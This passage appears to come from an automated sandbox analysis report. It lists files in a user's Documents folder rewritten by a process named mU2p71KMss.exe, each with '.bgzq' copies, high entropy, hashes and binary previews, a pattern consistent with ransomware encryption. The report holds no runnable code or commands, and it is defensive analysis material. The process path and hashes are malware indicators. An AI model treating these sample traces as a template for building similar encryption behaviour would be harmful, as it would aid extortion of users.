                                                                                                SHA-256:F8A647EA4742811A0C564E6BE8DAA4FEAB57339C4627A16E08941BFAA857EE80
                                                                                                SHA-512:4A95AE5BAC25978C6A2248A32E9E1A4503789FF4D8AF5BB8FB554293D2488FD92853C06702018C0C18E81D50F30FC8B403C6EB7C32F9495169C64DD4D8401FB4
                                                                                                Malicious:false
                                                                                                Preview:GRXZDD..}[q..pn+..7.`.}....Y...s(......1x..2....;....p.|x...c-....].Z......25.S..-+..C.....I..2|..........`..b....8......[.~.%.r|.F|..0.4....d....^.ro....B..&:>Obc!N-.............\RK..Q..%....F....U._>...1-.%.....7.&...4r.8.........5>..O..N.T...S......HqS..h..)...|n..Y.....7U.^...exW..%..:v2...{.NqY'o.VT...hH..SN....>.7eGw...`.....d7.#..Q .......K..f..`.o....lF.:...'..$..V.....R[6.9.cl.9....?..kp..Ih ...0........V.r...._Z 0...7..a...#........Y.....gq.8..#+..B .6....+..n.....6.3_~...a..t.........<.B....Y*.r5"..0.gy....'..q......Bs<.S...:n.....`.$Mu...A@lFW..(u../.S..)..m#...r...`r.oP.D..,QH._..... .{.....3...A......N/o...3..K/L..2\..}.t...Q..a........wS..L..W.....Ig..76y..mC..WD\.....2..._Q..7....^.)5..m/..>'X...m=..N9.....K....Q&.....%..............G......O.[(T..{g.5..27....[.. `k.~..Q....QX. ....JUx...F.}..3.Z.e....\?...{%Z....J..z~..U.-.[fUR-~../f..3PL...L].S.'Y^..9VA.G..b.Y...nb....`......HD...Q?x.4%.k.tV...&.-.^...m...Y.

                                                                                                C:\Users\user\Documents\GRXZDKKVDB.mp3.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.838826221715445
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:cC3GUvQZYJsJG2OYTg3/gNyYNB/3yzoQObbLv6eeXpkJQlTQXfzIbD:cWOZYWJaYygN3gcDieCp1lmfzSD
                                                                                                MD5:09810C88F717813B5445272D14A0E3F9
                                                                                                SHA1:C5404A8DB19C2FF99B09B2179FCF1A725F6DED4B
                                                                                                SHA-256:F8A647EA4742811A0C564E6BE8DAA4FEAB57339C4627A16E08941BFAA857EE80
                                                                                                SHA-512:4A95AE5BAC25978C6A2248A32E9E1A4503789FF4D8AF5BB8FB554293D2488FD92853C06702018C0C18E81D50F30FC8B403C6EB7C32F9495169C64DD4D8401FB4
                                                                                                Malicious:false
                                                                                                Preview:GRXZDD..}[q..pn+..7.`.}....Y...s(......1x..2....;....p.|x...c-....].Z......25.S..-+..C.....I..2|..........`..b....8......[.~.%.r|.F|..0.4....d....^.ro....B..&:>Obc!N-.............\RK..Q..%....F....U._>...1-.%.....7.&...4r.8.........5>..O..N.T...S......HqS..h..)...|n..Y.....7U.^...exW..%..:v2...{.NqY'o.VT...hH..SN....>.7eGw...`.....d7.#..Q .......K..f..`.o....lF.:...'..$..V.....R[6.9.cl.9....?..kp..Ih ...0........V.r...._Z 0...7..a...#........Y.....gq.8..#+..B .6....+..n.....6.3_~...a..t.........<.B....Y*.r5"..0.gy....'..q......Bs<.S...:n.....`.$Mu...A@lFW..(u../.S..)..m#...r...`r.oP.D..,QH._..... .{.....3...A......N/o...3..K/L..2\..}.t...Q..a........wS..L..W.....Ig..76y..mC..WD\.....2..._Q..7....^.)5..m/..>'X...m=..N9.....K....Q&.....%..............G......O.[(T..{g.5..27....[.. `k.~..Q....QX. ....JUx...F.}..3.Z.e....\?...{%Z....J..z~..U.-.[fUR-~../f..3PL...L].S.'Y^..9VA.G..b.Y...nb....`......HD...Q?x.4%.k.tV...&.-.^...m...Y.

                                                                                                C:\Users\user\Documents\GRXZDKKVDB.pdf

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.8589951334744965
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:waam4MC2A6rta4z3qxo7clC9fF25f39GKdcCDM2WIP+sYDd+2cfBp3cRffXfzIbD:waj4hdi3qm7KCJQ5f9GKiCDDWIP4Yqd2
                                                                                                MD5:8F613F06A167615FF14D6727D2E4A433
                                                                                                SHA1:7D0AAB629751FE861CCCA10840F201DCBE376B0B
                                                                                                SHA-256:8BCABE948F00EDE9A1CA8683D2706FBE11E3D9BAC9F80B0145B8020B3AED8A71
                                                                                                SHA-512:1C069D971F18AD3970E74B4E26C6D938EE0BF8DF4477E4ECD1E039C2D48DB7197E1CDD6C985D813BDDFFBE4A322C86BB9FEA296ED2DCFBE4736ADAD1EF142907
                                                                                                Malicious:false
                                                                                                Preview:GRXZD.g......__C0.Uh...4....{.....3.<.a.g.e..x4]..F..].."........^G..R.u#.U.}HU}.]/.m.`)X...._.~/..~...Kk.b................K..._.].d.B....o.+........1.k0G.*k...q...R.Tf..l EC....eY.o.....T....~Be.uI.....\.n.r.!E....P........3...v....Cb}...F........8.A....T....`.L.{RV....w..R.~ w.N......n.ZoZ..B....e....!.m.[Sh1.....)P.0p..g.E4E.*.3.u.......'..Z.{z..9Z.{9......._.Nl....J....,..ws...'.v.....oQ.....;.:..K][-.=.VuP#..#.F.4f..^{.acD..}..GU...... ...6.....P....@..L..v.Z*..Q.,.|.a{....,.O...u..=.[..\....g.v#..^.....OY..z...+............k../..Q...\}....6.........;/m.\.su"..).l.X:..A.hQ.1.A......i?.?.)..[..t.rJ.....4..>..9..Be..X9.......V.8.._..}.|.t.:X.?.E..;.@g.m..k...........[.....e.ZcWQ....b.6.....&M`...+...F...|...W5..m....-...U..{.....).0....>...8h.Q=.Tb.$.V.N.a.....`.O.....G.S../..v.x`!.z.t..$Oe..p.w.=|...GuW=..U..9....x.v..2.Q....]...X.,.....*lM..7..Y".~.7.Y.G..o.G....g|5P..p$........V.QJ..!.f.M..3."p.lx.1....(....b..9...i..Z. I.)...b..|'-.

                                                                                                C:\Users\user\Documents\GRXZDKKVDB.pdf.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.8589951334744965
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:waam4MC2A6rta4z3qxo7clC9fF25f39GKdcCDM2WIP+sYDd+2cfBp3cRffXfzIbD:waj4hdi3qm7KCJQ5f9GKiCDDWIP4Yqd2
                                                                                                MD5:8F613F06A167615FF14D6727D2E4A433
                                                                                                SHA1:7D0AAB629751FE861CCCA10840F201DCBE376B0B
                                                                                                SHA-256:8BCABE948F00EDE9A1CA8683D2706FBE11E3D9BAC9F80B0145B8020B3AED8A71
                                                                                                SHA-512:1C069D971F18AD3970E74B4E26C6D938EE0BF8DF4477E4ECD1E039C2D48DB7197E1CDD6C985D813BDDFFBE4A322C86BB9FEA296ED2DCFBE4736ADAD1EF142907
                                                                                                Malicious:false
                                                                                                Preview:GRXZD.g......__C0.Uh...4....{.....3.<.a.g.e..x4]..F..].."........^G..R.u#.U.}HU}.]/.m.`)X...._.~/..~...Kk.b................K..._.].d.B....o.+........1.k0G.*k...q...R.Tf..l EC....eY.o.....T....~Be.uI.....\.n.r.!E....P........3...v....Cb}...F........8.A....T....`.L.{RV....w..R.~ w.N......n.ZoZ..B....e....!.m.[Sh1.....)P.0p..g.E4E.*.3.u.......'..Z.{z..9Z.{9......._.Nl....J....,..ws...'.v.....oQ.....;.:..K][-.=.VuP#..#.F.4f..^{.acD..}..GU...... ...6.....P....@..L..v.Z*..Q.,.|.a{....,.O...u..=.[..\....g.v#..^.....OY..z...+............k../..Q...\}....6.........;/m.\.su"..).l.X:..A.hQ.1.A......i?.?.)..[..t.rJ.....4..>..9..Be..X9.......V.8.._..}.|.t.:X.?.E..;.@g.m..k...........[.....e.ZcWQ....b.6.....&M`...+...F...|...W5..m....-...U..{.....).0....>...8h.Q=.Tb.$.V.N.a.....`.O.....G.S../..v.x`!.z.t..$Oe..p.w.=|...GuW=..U..9....x.v..2.Q....]...X.,.....*lM..7..Y".~.7.Y.G..o.G....g|5P..p$........V.QJ..!.f.M..3."p.lx.1....(....b..9...i..Z. I.)...b..|'-.

                                                                                                C:\Users\user\Documents\GRXZDKKVDB.xlsx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.824672759455236
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:cV+IftFIH+Ay45b1DG4uxzHhloqVgGNdKgNMfF84wxwd/X5TauXfzIbD:ujfv2+A9tqThtx+tzoG/kYfzSD
                                                                                                MD5:D6A056545F7CDEEB9B3B8D3475723817
                                                                                                SHA1:D7EAEE1ECC230500CA90D42A94263B2437E059EA
                                                                                                SHA-256:8D28ABC25B3791124BEFA2FE0C3B906F01BCE4141BFFB0B4FB338460BCBA8FF7
                                                                                                SHA-512:ECA34E2244A3785F22E328A84335A73E9551274BAB3482F7758999EB2954DDB9FF947FE9FEB596CDB4431ECF9A16FBB92B8459E8433EB60181A405F86A7903C3
                                                                                                Malicious:false
                                                                                                Preview:GRXZDA..eV.dTe.!..@..._.''V..?.%.p....:E.]M..O.hJ..B'.hE=.....fk.1...EK..F.tA.8...rwr{.1....N......!s...S......l....g~!Z.....G.p..o..{..........ya..#...u.....&..\S!;..X.....E..9...^.h.W...p...TQL...MA.5.[.~...T....W...S=.$./.....w.......'.._.@..#.HP."....D...t..7..R..h..X...;......Iu....9C...I....E&.[[......D....@@+\..2...iK.z..t....4R...X.U.S..... kV..%..!..VD#....A..e.x....&C8.8t..R.tw4..q...E.u.sf...[..X(Yq.TE.t.......p.H....3.9......k%..J.%&kubERZ.....z....vT.,.....W.7?r.%........g.U..;..v..".1m#...P.5&..l.W...DW.v..>a.....i*....g.#`..:u.....+k.T.(...VFGF....6..wJ..d...-....YM...i{Q.I...e..+....H.rt....~..._. ...SX+....S\.+#0$.!.P....a%..z.}..........%. ._..i....R.$.P...g.....i..T.a!...r.....d..?].f.i...~..T.....n1A...,4.r.1.....~..h..)7.4..D..zQ.W.c.N:E..tt.Z.`.ZnYz..e..r&....h.gB".0.....N....-..&.y..w.@..R...2.|.iB.....N."c..G.?!E.:....Zr.......*B..$..VR#B_.....pz.b*4........o<........>.q'.....?;b..yrah`P.

                                                                                                C:\Users\user\Documents\GRXZDKKVDB.xlsx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.824672759455236
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:cV+IftFIH+Ay45b1DG4uxzHhloqVgGNdKgNMfF84wxwd/X5TauXfzIbD:ujfv2+A9tqThtx+tzoG/kYfzSD
                                                                                                MD5:D6A056545F7CDEEB9B3B8D3475723817
                                                                                                SHA1:D7EAEE1ECC230500CA90D42A94263B2437E059EA
                                                                                                SHA-256:8D28ABC25B3791124BEFA2FE0C3B906F01BCE4141BFFB0B4FB338460BCBA8FF7
                                                                                                SHA-512:ECA34E2244A3785F22E328A84335A73E9551274BAB3482F7758999EB2954DDB9FF947FE9FEB596CDB4431ECF9A16FBB92B8459E8433EB60181A405F86A7903C3
                                                                                                Malicious:false
                                                                                                Preview:GRXZDA..eV.dTe.!..@..._.''V..?.%.p....:E.]M..O.hJ..B'.hE=.....fk.1...EK..F.tA.8...rwr{.1....N......!s...S......l....g~!Z.....G.p..o..{..........ya..#...u.....&..\S!;..X.....E..9...^.h.W...p...TQL...MA.5.[.~...T....W...S=.$./.....w.......'.._.@..#.HP."....D...t..7..R..h..X...;......Iu....9C...I....E&.[[......D....@@+\..2...iK.z..t....4R...X.U.S..... kV..%..!..VD#....A..e.x....&C8.8t..R.tw4..q...E.u.sf...[..X(Yq.TE.t.......p.H....3.9......k%..J.%&kubERZ.....z....vT.,.....W.7?r.%........g.U..;..v..".1m#...P.5&..l.W...DW.v..>a.....i*....g.#`..:u.....+k.T.(...VFGF....6..wJ..d...-....YM...i{Q.I...e..+....H.rt....~..._. ...SX+....S\.+#0$.!.P....a%..z.}..........%. ._..i....R.$.P...g.....i..T.a!...r.....d..?].f.i...~..T.....n1A...,4.r.1.....~..h..)7.4..D..zQ.W.c.N:E..tt.Z.`.ZnYz..e..r&....h.gB".0.....N....-..&.y..w.@..R...2.|.iB.....N."c..G.?!E.:....Zr.......*B..$..VR#B_.....pz.b*4........o<........>.q'.....?;b..yrah`P.

                                                                                                C:\Users\user\Documents\KLIZUSIQEN.png

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.8402972566897855
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:bR3yM8pWg027T3x4OiQx1P0RM63f0yaEJTDhksydWf6FRcBM64olqXfzIbD:ViDm2X0QxqMf2VSsyHDcW6d6fzSD
                                                                                                MD5:79FC0C0343D32352D7E757F9880C5B7B
                                                                                                SHA1:72EB26D3DEC2C24469B20C10D8888EAD77867A87
                                                                                                SHA-256:A76F2F4CC4FA1D1F2921529EB0B799E39B5927E6378EE117429144CB4A8CCD8B
                                                                                                SHA-512:F41A3CD1C7F1CFD36297DCC236452D64194F1FE0FFA014108E01F6B371D72DC34ED31F1B593B12CEBA661EC25820B9D10925283958AE84D2A7EE3EAA0132B369
                                                                                                Malicious:false
                                                                                                Preview:KLIZU.......h...>]....U..KE.}......X/}..@..K.Hn.{.T...O8...c.:ef...YB.@'...J2.G`U.z..^P.t.fqb.;.3D..8...]........$.J..7..R..&.7yc..W%.X..R.......8...&,.sj'p.og.v@...F....!.m....E././}D.y0...~.g.........!;.=.[...v.|....../.......[+k/.79.x..=.\Bz..h..@.!D".......T.....~...b*G..h...1.6}L....iE.#w...%.0.^....>}wT...3!N.,.w3....,...-......]..eMM|.d.iJ...j..... +.=...D......(.5.9...c.C!/..F..n@..QZ.o`. ....-....:T..<-...9:s.q6b..TPk.Z~.z...r]..P.......|B.<.]..D..[!..t.L......C.d......m6,.P].........-.$o..=:.N.].+*HF....m\...T..I.drB6..zy.o..`b`/~..:'.......J.WC.A.G..S@.......9..C...+Nbs.2Uj.....`..F.4...".Qo'.!B..\...$..v.....Rn.1......0C.......C6l1D...I|..0[.......`0..U0.....@y....z..;.......Jzh...r.l..^...A....@.RTeH...z....V....P.N.r.....+z.qBv..k..._#..h.t-)......xS..?cz.9..F..).....O.zR...?9.ST..qq.....Y1.A.D...2}I....A..Az.sZ........E..C/J.4.+.....S- =....K%Aq.A....9.d........`.\?+#X.w.g.+.lKgSQih....T@.iBD].S!...4...,.a.....;.c..[.

                                                                                                C:\Users\user\Documents\KLIZUSIQEN.png.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.8402972566897855
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:bR3yM8pWg027T3x4OiQx1P0RM63f0yaEJTDhksydWf6FRcBM64olqXfzIbD:ViDm2X0QxqMf2VSsyHDcW6d6fzSD
                                                                                                MD5:79FC0C0343D32352D7E757F9880C5B7B
                                                                                                SHA1:72EB26D3DEC2C24469B20C10D8888EAD77867A87
                                                                                                SHA-256:A76F2F4CC4FA1D1F2921529EB0B799E39B5927E6378EE117429144CB4A8CCD8B
                                                                                                SHA-512:F41A3CD1C7F1CFD36297DCC236452D64194F1FE0FFA014108E01F6B371D72DC34ED31F1B593B12CEBA661EC25820B9D10925283958AE84D2A7EE3EAA0132B369
                                                                                                Malicious:false
                                                                                                Preview:KLIZU.......h...>]....U..KE.}......X/}..@..K.Hn.{.T...O8...c.:ef...YB.@'...J2.G`U.z..^P.t.fqb.;.3D..8...]........$.J..7..R..&.7yc..W%.X..R.......8...&,.sj'p.og.v@...F....!.m....E././}D.y0...~.g.........!;.=.[...v.|....../.......[+k/.79.x..=.\Bz..h..@.!D".......T.....~...b*G..h...1.6}L....iE.#w...%.0.^....>}wT...3!N.,.w3....,...-......]..eMM|.d.iJ...j..... +.=...D......(.5.9...c.C!/..F..n@..QZ.o`. ....-....:T..<-...9:s.q6b..TPk.Z~.z...r]..P.......|B.<.]..D..[!..t.L......C.d......m6,.P].........-.$o..=:.N.].+*HF....m\...T..I.drB6..zy.o..`b`/~..:'.......J.WC.A.G..S@.......9..C...+Nbs.2Uj.....`..F.4...".Qo'.!B..\...$..v.....Rn.1......0C.......C6l1D...I|..0[.......`0..U0.....@y....z..;.......Jzh...r.l..^...A....@.RTeH...z....V....P.N.r.....+z.qBv..k..._#..h.t-)......xS..?cz.9..F..).....O.zR...?9.ST..qq.....Y1.A.D...2}I....A..Az.sZ........E..C/J.4.+.....S- =....K%Aq.A....9.d........`.\?+#X.w.g.+.lKgSQih....T@.iBD].S!...4...,.a.....;.c..[.

                                                                                                C:\Users\user\Documents\NVWZAPQSQL.docx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.876413384833549
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FLitL6aa9pUJce8+D0vAdnnEYoMg8lumGOZT2lX+/UKeRll0WIX4oXfzIbD:FLESFaaaEYo7T7uT2BVKev6WAfzSD
                                                                                                MD5:DAF724B8952F1778C9803ACE10A50103
                                                                                                SHA1:48C98CC19387C61EEB8F41D92E4C2C6D1381FBE5
                                                                                                SHA-256:16AB671742D3FEF8999204B9514A0EF6E8630DAD8F3327711521E7A74A07B740
                                                                                                SHA-512:1EA9D7E8F17C8D8638E13390B87D3D293B0E946CE74A2F19DEECA28C5E863D2C5667731A2E68C41D453B7D0AEF527C6B257BABAE2BE9010A15451DE88B877EDF
                                                                                                Malicious:false
                                                                                                Preview:NVWZA>v.f<,+>..7Lf..i.T....KX.....$......N..0....{..0....7.j.....x?S-...)...n.Q.D%.. .5...j.+...h.{...j;.....(..Q.............j........u-c.....:j.pplL9..... ...`.gO.............I@K|1}MsG..G,..=~..z.}5..>..h.<O.M........T.<...n.pgT......^..G=.E....u.j.@gm..Yh........G..J...u..._.8o..\.Hl..o5W..7...c...o].Dm<.#.t}......WL.5C&.....S...Jl...%...l]k*A....q.wd.!'..g)\Sb@M+.1.....%..W.C:dS<@W.1?.j....i).,<..>..F...i.T....A1M<b....X..].>....;m./.Vf*.Z...:.....&3G.........fo..B..8[.H.M.wyD..)\y.WjW..TD~..&....!.....b@......)]\...e.`C\......;..`'.q...+\.........L.....T...@.....x.vMV.. .@.W..qO..L.H..9|...?@.'!......1.......>.4.. o%.f..V...............:.O.(..lK...H.T...>..*.4-....Ucr..K....X..........j.\I#N.a{....fs<.*.....n..w......k.."..i['.J>.}.n....~:e(......^...X}\6..B.I...L..:.a~)M....|..O.[.=.....nle..+..xp..(.ZV..$.*..(.....e.."....E..(m.h0[.Z.I.}(.M..&..A..2..k. g....X. ..{Ng#.3!.@,+...d&6....F..aja.8.:HKe.$QUbd.b.F&w.."F...*.?u...S/..O

                                                                                                C:\Users\user\Documents\NVWZAPQSQL.docx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.876413384833549
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FLitL6aa9pUJce8+D0vAdnnEYoMg8lumGOZT2lX+/UKeRll0WIX4oXfzIbD:FLESFaaaEYo7T7uT2BVKev6WAfzSD
                                                                                                MD5:DAF724B8952F1778C9803ACE10A50103
                                                                                                SHA1:48C98CC19387C61EEB8F41D92E4C2C6D1381FBE5
                                                                                                SHA-256:16AB671742D3FEF8999204B9514A0EF6E8630DAD8F3327711521E7A74A07B740
                                                                                                SHA-512:1EA9D7E8F17C8D8638E13390B87D3D293B0E946CE74A2F19DEECA28C5E863D2C5667731A2E68C41D453B7D0AEF527C6B257BABAE2BE9010A15451DE88B877EDF
                                                                                                Malicious:false
                                                                                                Preview:NVWZA>v.f<,+>..7Lf..i.T....KX.....$......N..0....{..0....7.j.....x?S-...)...n.Q.D%.. .5...j.+...h.{...j;.....(..Q.............j........u-c.....:j.pplL9..... ...`.gO.............I@K|1}MsG..G,..=~..z.}5..>..h.<O.M........T.<...n.pgT......^..G=.E....u.j.@gm..Yh........G..J...u..._.8o..\.Hl..o5W..7...c...o].Dm<.#.t}......WL.5C&.....S...Jl...%...l]k*A....q.wd.!'..g)\Sb@M+.1.....%..W.C:dS<@W.1?.j....i).,<..>..F...i.T....A1M<b....X..].>....;m./.Vf*.Z...:.....&3G.........fo..B..8[.H.M.wyD..)\y.WjW..TD~..&....!.....b@......)]\...e.`C\......;..`'.q...+\.........L.....T...@.....x.vMV.. .@.W..qO..L.H..9|...?@.'!......1.......>.4.. o%.f..V...............:.O.(..lK...H.T...>..*.4-....Ucr..K....X..........j.\I#N.a{....fs<.*.....n..w......k.."..i['.J>.}.n....~:e(......^...X}\6..B.I...L..:.a~)M....|..O.[.=.....nle..+..xp..(.ZV..$.*..(.....e.."....E..(m.h0[.Z.I.}(.M..&..A..2..k. g....X. ..{Ng#.3!.@,+...d&6....F..aja.8.:HKe.$QUbd.b.F&w.."F...*.?u...S/..O

                                                                                                C:\Users\user\Documents\NVWZAPQSQL.jpg

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.845841784241811
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FfQcIMqsvJukLuWX2GzSKQX3D3GeO/aa++bvtD3+Do4XadaBqvM0xJ4YztCXfzIX:FfbIMq4JukLuWX2QSKQHDzI7++b161Ta
                                                                                                MD5:51CD9F5A25FE96BE26D570C7A457470D
                                                                                                SHA1:5E7018AADD8DD4537F3E38D7E01B8EB16568E2C0
                                                                                                SHA-256:A1AAF7E992F3D3B66073BC3EBD26E82D5DD8FFFEA551395D9E3F6DB93FBAAFF8
                                                                                                SHA-512:C0D7A5BD021F828D8E1994BAE5B923FCB99CA712E7711EE7B91CC65CF291BAA20BAAADCAE4E2EF4800311B6826FC99B81D0214AFDBC52ACD24796917C0FB44E6
                                                                                                Malicious:false
                                                                                                Preview:NVWZA%dQ..=....w!LH.._Y.9T.os...:!.^.B..R.D.^.].L."U@O.9y.8jG.,....:~.>c.#....\$k...*. ....S+..L..[.........o8B.../.P.5M.kG..S.~A)...s..6s..S.T_.5j..C...U..L.D.R.K..y(.j..fbm7..WB..._U.&i....K+..E*.O.DQz.Y9g.CR.#nm.e)...6..........!?.(....P.%.=.......es..e....?....mx.}.s..u.F,..........F..P..Iz.4q.lDX........5. SbMC.W[^e...S.j..a...D.)....%+O.7......ZT.....fwc..r.).g..8.c.........?.[...Z3....H-....`.$H>.Xcs.H.4.\.......+...^....L..0I....ptW.(......:-.......w..A(.O.|a_..0...g..P.W.)...I....h.5.V.w.......~^..`}.2..0..Dsv,YU#.T............sD..M.N..av.V...P>.......U....$y...2g...Vo....HB[..9.{..^.+'.....~........R.x.......b.#L..>..9..;...7.d.....evQN_..i....Rj@O..p ...?....f..P.....GaMD..1;..2...(.^._.15.8....i.c.C...L.=.4.,.S...3dL...#.KJ.v.......d.x....`..CL.i.G.t.6...j.....(y.....B.....$.....5...R1.rD%.8.OabQ..V.........@.._..V7?...I....0MH....F.a:..M$..4....(KU.z....P..9.tg.h.P..9....F8K] .N.q....=..;..'..Pn.(..>.B.M7.:..

                                                                                                C:\Users\user\Documents\NVWZAPQSQL.jpg.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.845841784241811
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FfQcIMqsvJukLuWX2GzSKQX3D3GeO/aa++bvtD3+Do4XadaBqvM0xJ4YztCXfzIX:FfbIMq4JukLuWX2QSKQHDzI7++b161Ta
                                                                                                MD5:51CD9F5A25FE96BE26D570C7A457470D
                                                                                                SHA1:5E7018AADD8DD4537F3E38D7E01B8EB16568E2C0
                                                                                                SHA-256:A1AAF7E992F3D3B66073BC3EBD26E82D5DD8FFFEA551395D9E3F6DB93FBAAFF8
                                                                                                SHA-512:C0D7A5BD021F828D8E1994BAE5B923FCB99CA712E7711EE7B91CC65CF291BAA20BAAADCAE4E2EF4800311B6826FC99B81D0214AFDBC52ACD24796917C0FB44E6
                                                                                                Malicious:false
                                                                                                Preview:NVWZA%dQ..=....w!LH.._Y.9T.os...:!.^.B..R.D.^.].L."U@O.9y.8jG.,....:~.>c.#....\$k...*. ....S+..L..[.........o8B.../.P.5M.kG..S.~A)...s..6s..S.T_.5j..C...U..L.D.R.K..y(.j..fbm7..WB..._U.&i....K+..E*.O.DQz.Y9g.CR.#nm.e)...6..........!?.(....P.%.=.......es..e....?....mx.}.s..u.F,..........F..P..Iz.4q.lDX........5. SbMC.W[^e...S.j..a...D.)....%+O.7......ZT.....fwc..r.).g..8.c.........?.[...Z3....H-....`.$H>.Xcs.H.4.\.......+...^....L..0I....ptW.(......:-.......w..A(.O.|a_..0...g..P.W.)...I....h.5.V.w.......~^..`}.2..0..Dsv,YU#.T............sD..M.N..av.V...P>.......U....$y...2g...Vo....HB[..9.{..^.+'.....~........R.x.......b.#L..>..9..;...7.d.....evQN_..i....Rj@O..p ...?....f..P.....GaMD..1;..2...(.^._.15.8....i.c.C...L.=.4.,.S...3dL...#.KJ.v.......d.x....`..CL.i.G.t.6...j.....(y.....B.....$.....5...R1.rD%.8.OabQ..V.........@.._..V7?...I....0MH....F.a:..M$..4....(KU.z....P..9.tg.h.P..9....F8K] .N.q....=..;..'..Pn.(..>.B.M7.:..

                                                                                                C:\Users\user\Documents\NVWZAPQSQL.xlsx

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.863698812046252
                                                                                                Encrypted:false
                                                                                                SSDEEP:24:FXj4Aq1AqwrsF91WCv6XmnvsSQPcomOfR4OHv5gN3RbJczS2YZHSKtXfzIbD:FUACtwt2sUrOfDB+BNc+T1S+fzSD
                                                                                                MD5:F551407B42A6C4D3E448CA1FEA0B31F2
                                                                                                SHA1:37BC720241E991C0ADE1E1428380B0CC051F2DE8
                                                                                                SHA-256:6546149C81E8176175A8114FAF8B230FFA87D1B9EFED3EC6399C1A427AB3BF1C
                                                                                                SHA-512:0009372BFC460ABC84AEEAB8900A95FD13AE4DAA7A92CE9417E614AA5841EE03D83AB755EF54315F44E8D7E5C3A241FE450A95E62B1B0B9858C8DDCA847A33D1
                                                                                                Malicious:false
                                                                                                Preview:NVWZA.X.....'.Y%...!.p.I...5....d..'.#..8.<...'..Y..%0?..5g..<q.w&..L..aS....q.2.. .%H.............Q8...*H.,..^2H..R.lA%.7v.>XA.........YZ...)......T..A<,..W.k..H...P.qz..A.....^....qe.9..."*...u.dQ...'...9....H.Jp..Q[.....5c>.g0^\K..=.F..r...a..e'y..%O.3;..2..9...I..(C&.}..9>.?."......~.i.1U....'....0..0..y...Z..n.."...S.Z?.>Rxd.vY].G.......n>..7t*....k...s.b...v..8.0. +w.{e....?n[y..........E....&..q.p..@"t..M..d.9.Mx.... .......8.bb.h..d.....;.%.q/8...b...l.....y.go....M..`._f....Y.Zx..=..P..........L%....IH....'a..#..J.:{\.x.~.'S>..t.V.X...K.S./.......T..... .=.{..k.&\mR...n7b..n..d.Su.(.....B={P....v.5x|B...zU......Q.3&.l...D..]...J...wWS.......H"..h#e.x..r....:....B....`..0...s/..#.px6.'j.##".6[z&...k%/<.M..1.]..H%.L!..$......}....Q.>.OK...p........r<x.1K=..t.....;...w...".o..+.\WF..Qw.N..g.}..A..$vP"n......>f...'.P..u.QS.mf.D\...a.f...@.....$..b;A.........$w...4.)..o.Ai......X.~...d.....}&....X.$......C.e....R...H.H.}...K.>..q.B8...o

                                                                                                C:\Users\user\Documents\NVWZAPQSQL.xlsx.bgzq (copy)

                                                                                                Download File
                                                                                                Process:C:\Users\user\AppData\Local\f261f702-1524-4c10-82ff-88b548e0117a\mU2p71KMss.exe
                                                                                                File Type:data
                                                                                                Category:dropped
                                                                                                Size (bytes):1360
                                                                                                Entropy (8bit):7.863698812046252
                                                                                                Encrypted:false
